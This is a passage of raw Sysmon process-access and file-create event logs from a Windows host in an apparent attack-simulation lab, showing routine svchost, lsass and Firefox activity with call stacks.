14:04:55.741{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018822Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:55.741{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018821Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:55.741{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018820Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:55.741{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018819Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:55.741{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018818Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:55.741{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018817Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:55.741{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018816Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:55.741{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018815Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:55.741{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018814Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:55.741{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018813Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:55.741{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018812Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:55.741{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018811Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:55.741{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018810Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:55.741{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018809Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:55.741{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018808Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:55.741{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018807Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:55.741{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018806Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:55.741{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018805Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:55.741{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018804Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:55.741{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018803Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:55.741{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018802Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:55.741{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018801Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:55.741{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018800Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:55.741{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018799Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:55.741{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018798Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:55.741{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x800000000000000018825Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:57.523{59A5CD1D-945A-6005-3305-00000000A301}7052C:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\0lpne0dw.default-release\SiteSecurityServiceState.txt2021-01-18 14:04:57.523 10341000x800000000000000018865Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:59.351{59A5CD1D-945A-6005-3305-00000000A301}70526276C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-958B-6005-6405-00000000A301}6520C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+f74b0e|C:\Program Files\Mozilla Firefox\xul.dll+1087037|C:\Program Files\Mozilla Firefox\xul.dll+11c4361|C:\Program Files\Mozilla Firefox\xul.dll+f82f80|C:\Program Files\Mozilla Firefox\xul.dll+f845d3|C:\Program Files\Mozilla Firefox\xul.dll+3b226|C:\Program Files\Mozilla Firefox\xul.dll+39cbd|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+a88d85|C:\Program Files\Mozilla Firefox\nss3.dll+12e8aa|C:\Program Files\Mozilla Firefox\nss3.dll+11f961|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018864Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:59.335{59A5CD1D-8E46-6005-1100-00000000A301}11721848C:\Windows\system32\svchost.exe{59A5CD1D-958B-6005-6405-00000000A301}6520C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6624|c:\windows\system32\fntcache.dll+17aaf|c:\windows\system32\fntcache.dll+1a677|c:\windows\system32\fntcache.dll+1aaac|c:\windows\system32\fntcache.dll+502ee|c:\windows\system32\fntcache.dll+4fff2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018863Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:59.335{59A5CD1D-8E46-6005-1100-00000000A301}11721848C:\Windows\system32\svchost.exe{59A5CD1D-958B-6005-6405-00000000A301}6520C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6624|c:\windows\system32\fntcache.dll+17aaf|c:\windows\system32\fntcache.dll+1a677|c:\windows\system32\fntcache.dll+1aaac|c:\windows\system32\fntcache.dll+502ee|c:\windows\system32\fntcache.dll+4fff2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018862Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:59.319{59A5CD1D-8E44-6005-0B00-00000000A301}856588C:\Windows\system32\lsass.exe{59A5CD1D-958B-6005-6405-00000000A301}6520C:\Program Files\Mozilla Firefox\firefox.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018861Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:59.319{59A5CD1D-8E44-6005-0B00-00000000A301}856588C:\Windows\system32\lsass.exe{59A5CD1D-958B-6005-6405-00000000A301}6520C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018860Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:59.298{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-958B-6005-6405-00000000A301}6520C:\Program Files\Mozilla 